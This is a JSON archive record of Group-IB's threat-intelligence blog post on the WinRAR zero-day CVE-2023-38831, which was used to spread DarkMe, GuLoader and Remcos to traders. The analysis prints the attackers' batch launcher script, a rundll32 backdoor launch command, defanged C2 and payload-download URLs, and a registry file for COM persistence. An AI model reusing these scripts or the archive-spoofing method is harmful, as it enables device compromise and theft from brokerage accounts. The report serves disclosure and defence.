{
	"id": "f40a0291-1f2e-4e23-a362-c1da14afed5f",
	"created_at": "2026-04-06T15:52:26.072911Z",
	"updated_at": "2026-04-10T03:34:23.43278Z",
	"deleted_at": null,
	"sha1_hash": "55db8d88cdcccfef3e4414a91013f73ba506f20e",
	"title": "CVE-2023-38831 zero-Day vulnerability in WinRAR | Group-IB Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 980836,
	"plain_text": "Andrey Polovinkin\r\nTeam Lead Reverse Research, APAC\r\nTraders' Dollars in Danger: CVE-2023-38831 Zero-Day vulnerability in WinRAR exploited by cybercriminals to target traders\r\nSpoof extensions help cybercriminals target users on trading forums as 130 devices still infected at time of writing\r\nAugust 23, 2023 · Threat Intelligence\r\nhttps://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\r\nPage 1 of 19\r\nTrading WinRAR Zero-Day\r\nWith over 500 million users worldwide, WinRAR is one of the most popular compression tools. You would probably struggle to find someone who has never downloaded or opened this vital tool. If somebody receives an archive in an email with malicious content, they will most likely open it with WinRAR. Consequently, threat actors invest time in identifying vulnerabilities in this and other popular programs commonly utilized by internet users.\r\nOn July 10, 2023, while researching the spread of DarkMe malware, the Group-IB Threat Intelligence unit came across a previously unknown vulnerability in the processing of the ZIP file format by WinRAR. By exploiting a vulnerability within this program, threat actors were able to craft ZIP archives that serve as carriers for various malware families. Weaponized ZIP archives were distributed on trading forums. Once extracted and executed, the malware allows threat actors to withdraw money from broker accounts. This vulnerability has been exploited since April 2023.\r\nUpon discovering the error in how WinRAR opens a file from within a ZIP archive, which the threat actors were exploiting, and assessing the identified security flaw, Group-IB immediately notified RARLAB about the findings and worked closely with the company’s development team to resolve the security issue. Group-IB researchers also reached out to the MITRE Corporation on July 12, 2023 to request the assignment of a CVE number to the identified vulnerability. On August 15, 2023, MITRE Corporation assigned this zero-day vulnerability the identifier CVE-2023-38831.\r\nWe would like to thank the team at RARLAB and especially Eugene Roshal, the main developer of the RAR file format, the WinRAR file archiver, and the FAR file manager, among others. The RARLAB team immediately responded to our request and fixed the vulnerability at very short notice. The beta version of the patch was issued on July 20, 2023, and the final updated version of WinRAR (version 6.23) was released on August 2, 2023.\r\nWe highly recommend that all users install the latest version of WinRAR\r\nIn this blog post, we document our discovery of this zero-day vulnerability that can be exploited by cybercriminals. We found that threat actors use the identified vulnerability to deliver a variety of malware families, putting unsuspecting users at risk. As part of our investigation, we monitored the distribution of these dangerous ZIP archives to specialized forums where cybercriminals shared their malicious payloads. Once infected, the consequences can be serious, with cybercriminals using their access to withdraw funds from brokerage accounts.\r\nBe sure to follow Group-IB’s blog, which highlights the latest cybersecurity threats and provides valuable insights to protect your digital assets and data.\r\nKey Findings\r\nGroup-IB Threat Intelligence unit identified a zero-day vulnerability in WinRAR that has been exploited since April 2023\r\nThe cybercriminals are exploiting a vulnerability that allows them to spoof file extensions, which means that they are able to hide the launch of a malicious script within an archive masquerading as a ‘.jpg’, ‘.txt’, or any other file format\r\nThis vulnerability was reported to RARLAB, which subsequently issued a new version of WinRAR\r\nThe vulnerability was reported to MITRE Corporation, and was assigned CVE-2023-38831.\r\nA ZIP archive was crafted to deliver various malware families: DarkMe, GuLoader, Remcos RAT\r\nThe ZIP archives were distributed in specialist forums for traders\r\n130 traders’ devices are still infected at the moment of posting. Group-IB cannot confirm the total number of devices that were infected as a result of this vulnerability.\r\nAfter infecting devices, the cybercriminals withdraw money from broker accounts. The total amount of financial losses is still unknown.\r\nThe cybercriminals are exploiting this vulnerability to deliver the same tool used in the DarkCasino campaign described by NSFOCUS (Part 1, Part 2).\r\nInitially, our research led us to believe that this was a known evolution of a vulnerability previously discovered by security researcher Danor Cohen in 2014. A method of modifying the ZIP header to spoof file extensions was observed, but further investigation revealed that this was not the case. Instead, our analysis revealed the existence of a new vulnerability in WinRAR.\r\nInitial access\r\nWhile monitoring the activity of the DarkMe malware family in the wild, Group-IB recently identified a number of suspicious ZIP archives. A thorough analysis of these archives revealed an anomaly in their behavior that prompted us to investigate the files in more detail.\r\nThe discovered ZIP archives, targeted at traders specifically, were posted by the threat actors behind this campaign on public forums where traders frequently engage in discussions and share useful information with each other. In most cases, the archive was attached to the post (as in Figure 1 below), but in some cases the malicious ZIP archive was distributed on a free-to-use file storage service called catbox.moe. In total, Group-IB discovered that these malicious ZIP archives were posted on at least eight popular trading forums.\r\nTaking one of the affected forums as an example, some of the administrators became aware that harmful files were being shared on the forum, and subsequently issued a warning to users. Despite this warning, further posts were made and more users were affected. Our researchers also saw evidence that the threat actors were able to unblock accounts that had been disabled by forum administrators in order to continue spreading malicious files, whether by posting in threads or sending private messages.\r\nFigure 1. Example of a post made by a threat actor\r\nWhen the crafted ZIP archives reached the systems of the targeted traders, the malware payloads contained inside the archives were executed, leading to their devices being compromised. According to one of the victims (Figure 7), the cybercriminals gained unauthorized access to their broker accounts, which meant that the bad actors were able to perform illicit financial transactions and withdraw funds. We have no evidence to confirm that the opening of the archive and the unauthorized access to the account are related, but we strongly believe that this is no coincidence. The withdrawal was unsuccessful and the hackers were only able to conduct a handful of trades that led to the victim suffering a small loss of $2. See the victim’s comment below.\r\nFigure 7. A victim’s post about an unsuccessful cyber attack\r\nFigure 5. Admin notification of malicious RAR file distribution for forum users\r\nLet’s examine the potential consequences of opening a malicious ZIP archive. When a victim opens this sort of file, what do they see? Well, it depends on the bait text that they encounter, which in this particular case was posted on trading forums. So for example, in this scheme we saw cybercriminals pretending to offer their “best Personal Strategy to trade with bitcoin” (see Figure 3 and Figure 4), and attaching the malicious archives to these posts. In other instances, the attackers gain access to forum accounts and share harmful files in existing threads, pretending they are collections of scripts to calculate different indicators, like the file named “Omnis averages.zip” (see Figure 1 above).\r\nAll the archives we identified were created using the same method. They also all had a similar structure, consisting of a decoy file and a folder containing a mix of malicious and unused files. If the user opens the decoy file, which appears as a .txt, .jpg, or another file extension in WinRAR, a malicious script is instead executed.\r\nFigure 8. The sequence diagram of the file extension spoofing exploit (CVE-2023-38831)\r\nUpon discovering this process, Group-IB experts were able to conclude that the cybercriminals are exploiting a previously unknown vulnerability in WinRAR, later assigned the number CVE-2023-38831. This vulnerability allows malicious actors to hide the launching of a malicious script by creating decoys with spoofed extensions.\r\nAnalysis of vulnerability exploitation\r\nThe cybercriminals are exploiting a vulnerability that allows them to spoof file extensions, which means that they are able to hide the launch of malicious code within an archive masquerading as a ‘.jpg’, ‘.txt’, or any other file format. They create a ZIP archive containing both malicious and non-malicious files. When the victim opens a specially crafted archive, the victim will usually see an image file and a folder with the same name as the image file.\r\nFigure 9. An example of a malicious ZIP archive containing a file with a spoofed extension\r\nIf the victim clicks on the decoy file, which can masquerade as an image, a script is executed that launches the next stage of the attack. This process is illustrated in Figure 10 (below).\r\nFigure 10. Group-IB Managed XDR process creation graph\r\nDuring our investigation, we noticed that the ZIP archive has a modified file structure. There are two files in the archive: a picture and a script. Instead of the image opening, the script is launched. The script’s main purpose is to initiate the next stage of the attack. This is done by running a minimized window of itself. It then searches for two specific files, namely “Screenshot_05-04-2023.jpg” and “Images.ico.” The JPG file is the image that the victim opened initially. “Images.ico” is an SFX CAB archive designed to extract and launch new files. Below is an example of the script:\r\n@echo off\r\nif not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 \u0026\u0026 start \"\" /min \"%~dpnx0\" %* \u0026\u0026 exit\r\ncd %TEMP%\r\nfor /F \"delims=\" %%K in ('dir /b /s \"Screenshot_05-04-2023.jpg\"') do for /F \"delims=\" %%G in ('dir /b /s \"Images.ico\"') do WMIC process call create \"%%~G\" \u0026\u0026 \"%%~K\" \u0026\u0026 cd %CD% \u0026\u0026 exit\r\nexit\r\nTo understand how the vulnerability works, we created two archives that mimic the discovered archive’s structure. Both archives contain an image file, and each archive also includes an inner folder with a single file that stores a script, triggering a message box display. Next, we modified one of the archives to resemble the archive used by the cybercriminals and compared how WinRAR behaved in each case.\r\nSpecifically, we wanted to determine what files will be created in the %TEMP%/%RARTMPDIR% folder when opening the archives created during the previous step. In the original ZIP file, only the image.jpg file is created. In the case of the specially crafted ZIP archive, however, the contents of the folder will also be extracted.\r\nFigure 11. Comparing the list of files that are created when WinRAR opens different archives\r\nAs you can see, in the case of the modified version of the archive, WinRAR extracts both files, ensuring that the attack is at least partially successful. In the interest of brevity, we will not focus on all the details of the vulnerability, but instead provide a brief explanation.\r\nThe main phase of the attack occurs when WinRAR attempts to open the file that the user wants to access. The ShellExecute function receives the wrong parameter to open the file. The picture’s file name will not match the search criteria, resulting in it being skipped. Instead of finding the intended picture, the batch file is discovered and executed.\r\nFigure 12. Demonstration of reproducing the vulnerability\r\nDarkMe\r\nIn mid-2022, NSFOCUS researchers discovered (Part 1, Part 2) a type of malware called DarkMe during their investigation into the DarkCasino campaign. DarkMe is a Visual Basic spy Trojan first spotted in September 2021. NSFOCUS has attributed DarkMe to a financially motivated group called Evilnum, which is known for targeting financial organizations.\r\nFigure 13. APT Evilnum profile in Group-IB Threat Intelligence portal\r\nThe launch process for DarkMe is complex and involves multiple modules. First, the script mentioned earlier launches the Cabinet Self-extractor file. A Cabinet Self-extractor file, commonly known as an SFX CAB file, is a type of archive file that contains compressed data and is designed to extract its contents automatically. The archive contains 5 files, and the main entry will be the ‘cc.exe‘ file, which is launched after extraction.\r\nFigure 14. List of files in the SFX CAB archive\r\nAll executables are written in the Visual Basic language. As mentioned above, the initial execution is performed by the SFX archive, which runs “cc.exe”. Despite its relatively small functionality, the cc.exe executable plays a crucial role in initiating various malicious modules. The cc.exe executable has a few possible forms, and two of them have special elements called custom ActiveX controls. These controls are saved in files with the extension “.ocx“. When the program runs, these custom controls are loaded automatically and perform their malicious tasks.\r\nIn our case, we have two user controls that serve different functions. The first control is responsible for registering a COM object in Windows. During the registration process, registry keys are imported from the “add.txt” file. As a result, a specific COM object with a unique CLSID is registered in the infected system. The default value of the InprocServer32 key is populated with the path to a malicious DLL named “Cabinet.ocx”.\r\nFigure 15. Group-IB Managed XDR process diagram of the start of DarkMe\r\nThe second user control creates the file named “Cabinet.ocx“, whose path is inserted into the InprocServer32 registry key. The actual content of Cabinet.ocx is stored within the “fu.png” file, following the key phrase “tanzapinz1AM”.\r\nFigure 16. Demonstration of a DarkMe sample in the image\r\nBoth user controls defined by the threat actors launch and work at the same time. The control flow of each is managed by the delays in each module. Finally, cc.exe kills itself and launches the DarkMe backdoor using the command below:\r\nrundll32.exe /sta {EA6FC2FF-7AE6-4534-9495-F688FEC7858C}\r\nAll the DarkMe samples contained in the discovered ZIP variants used the domain name 87iavv[.]com as the C2, but in one case they used tganngs9[.]com. Using Group-IB’s proprietary and patented Graph Network Analysis tool, further DarkMe C2 domains were discovered (trssp05923[.]com and 12jyyu06[.]com) at the same IP address.\r\nFigure 17. Outline of network relationships. Source: Group-IB Graph Network Analysis tool\r\nCloudEye aka GuLoader\r\nWe made another noteworthy discovery during our analysis. We found ZIP variants that used NSIS installers instead of SFX archives. The NSIS script has many unnecessary function calls, which makes it harder to analyze. Surprisingly, the NSIS package includes the original NSIS script with comments, which made our analysis much easier. In addition, some comments in the script include Italian words such as SHELL_PATH_ETICHETTA and FILE_VITALE.\r\nFigure 18. The original NSIS installation script\r\nOnce the initial setup is done, different PowerShell scripts will run to launch the final payload. These scripts are designed to be hard to understand, so we won’t go into details, seeing as they are not particularly important for our purposes. The NSIS package starts the launch by running the PS script stored in the file “Piskens.For187“, which is inside the package. This process also includes decrypting and running another stage, leading to the launch of CloudEye, also known as GuLoader. The package has another file called “Fibrolipoma.Ato“, which contains the GuLoader variant. This file is read, and its offset to shellcode is passed to the EnumResourceTypesW function.\r\nFigure 19. Group-IB Managed XDR process diagram of the start of GuLoader\r\nGuLoader then attempts to get to the next stage by making an HTTP request using the URL hXXps://corialopolova[.]com/idSqdvTuMawZBj41.bin. According to Group-IB Threat Intelligence, the cybercriminals used this domain between April 17, 2023 and July 18, 2023. After the payload is downloaded and decrypted, Remcos RAT is executed. To communicate with the cybercriminals, the domain mmnedgeggrrva[.]com is used.\r\nThreat Attribution\r\nAlthough we did identify the DarkMe Trojan, which is allegedly associated with EvilNum and is distributed together with a widely-used remote access tool, we cannot conclusively link the identified campaign to this financially motivated group. It is highly probable that similar tools from the same developer can be found on underground forums. We continue to closely monitor this malicious threat and will provide updates as they become available.\r\nConclusion\r\nRecent cases of exploitation of CVE-2023-38831 remind us of the constant risks connected to software vulnerabilities. Threat actors are highly resourceful, and they will always find new ways to discover and subsequently exploit vulnerabilities such as the one outlined in this blog. Organizations and individuals alike must remain vigilant, keep their systems updated, and follow security guidelines if they want to avoid falling victim to such attacks. It’s also essential for security researchers and software developers to work together and quickly identify and fix vulnerabilities, thereby making it harder for cybercriminals to take advantage of them.\r\nRecommendations\r\n1. Regularly update your operating system, applications, and security software to ensure you have the latest security patches. Update WinRAR to the latest version.\r\n2. Stay informed about common cyber threats and tactics used by cybercriminals. This knowledge can help you recognize potential risks and avoid falling victim to scams.\r\n3. Be very cautious when dealing with attachments from unknown sources. Avoid running files that you weren’t expecting or don’t recognize.\r\n4. Encourage the use of password managers for the storage of login data.\r\n5. Enable 2FA wherever possible to add an extra layer of security to your accounts.\r\n6. Back up your important data regularly to an external device.\r\n7. Follow the principle of least privilege by using standard user accounts instead of administrator accounts for daily tasks.\r\nAPPENDIX A. Example of a script to register a COM object\r\nWindows Registry Editor Version 5.00\r\n[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{EA6FC2FF-7AE6-4534-9495-F688FEC7858C}]\r\n@=\"Cabinet.ModuleClassK\"\r\n[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{EA6FC2FF-7AE6-4534-9495-F688FEC7858C}\\Implement\r\n[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{EA6FC2FF-7AE6-4534-9495-F688FEC7858C}\\Implement\r\n[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{EA6FC2FF-7AE6-4534-9495-F688FEC7858C}\\InprocSer\r\n@=\"Cabinet.ocx\"\r\n\"ThreadingModel\"=\"Apartment\"\r\n[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{EA6FC2FF-7AE6-4534-9495-F688FEC7858C}\\ProgID]\r\n@=\"Cabinet.ModuleClassK\"\r\n[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{EA6FC2FF-7AE6-4534-9495-F688FEC7858C}\\Programma\r\n[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{EA6FC2FF-7AE6-4534-9495-F688FEC7858C}\\TypeLib]\r\n@=\"{8F1576C0-BB08-4F05-87A6-268C0D548794}\r\n[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{EA6FC2FF-7AE6-4534-9495-F688FEC7858C}\\VERSION]\r\n@=\"1.0\"",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/"
	],
	"report_names": [
		"cve-2023-38831-winrar-zero-day"
	],
	"threat_actors": [
		{
			"id": "059b16f8-d4e0-4399-9add-18101a2fd298",
			"created_at": "2022-10-25T15:50:23.29434Z",
			"updated_at": "2026-04-10T02:00:05.380938Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"Evilnum"
			],
			"source_name": "MITRE:Evilnum",
			"tools": [
				"More_eggs",
				"EVILNUM",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "0bc63952-5795-4fc7-85c1-50a7f207f2f0",
			"created_at": "2023-11-14T02:00:07.095723Z",
			"updated_at": "2026-04-10T02:00:03.450401Z",
			"deleted_at": null,
			"main_name": "DarkCasino",
			"aliases": [],
			"source_name": "MISPGALAXY:DarkCasino",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a5bd315b-6220-441f-8ed1-39e194dcd0e3",
			"created_at": "2023-12-01T02:02:33.667762Z",
			"updated_at": "2026-04-10T02:00:04.641333Z",
			"deleted_at": null,
			"main_name": "DarkCasino",
			"aliases": [
				"Water Hydra"
			],
			"source_name": "ETDA:DarkCasino",
			"tools": [
				"CloudEyE",
				"DarkMe",
				"GuLoader",
				"PikoloRAT",
				"vbdropper"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8ce861d7-7fbd-4d9c-a211-367c118bfdbd",
			"created_at": "2023-01-06T13:46:39.153487Z",
			"updated_at": "2026-04-10T02:00:03.232006Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"EvilNum",
				"Jointworm",
				"KNOCKOUT SPIDER",
				"DeathStalker",
				"TA4563"
			],
			"source_name": "MISPGALAXY:Evilnum",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "39ea99fb-1704-445d-b5cd-81e7c99d6012",
			"created_at": "2022-10-25T16:07:23.601894Z",
			"updated_at": "2026-04-10T02:00:04.684134Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"G0120",
				"Jointworm",
				"Operation Phantom in the [Command] Shell",
				"TA4563"
			],
			"source_name": "ETDA:Evilnum",
			"tools": [
				"Bypass-UAC",
				"Cardinal RAT",
				"ChromeCookiesView",
				"EVILNUM",
				"Evilnum",
				"IronPython",
				"LaZagne",
				"MailPassView",
				"More_eggs",
				"ProduKey",
				"PyVil",
				"PyVil RAT",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Loader Stealer Module",
				"Taurus Loader TeamViewer Module",
				"Terra Loader",
				"TerraPreter",
				"TerraStealer",
				"TerraTV"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775490746,
	"ts_updated_at": 1775792063,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/55db8d88cdcccfef3e4414a91013f73ba506f20e.pdf",
		"text": "https://archive.orkl.eu/55db8d88cdcccfef3e4414a91013f73ba506f20e.txt",
		"img": "https://archive.orkl.eu/55db8d88cdcccfef3e4414a91013f73ba506f20e.jpg"
	}
}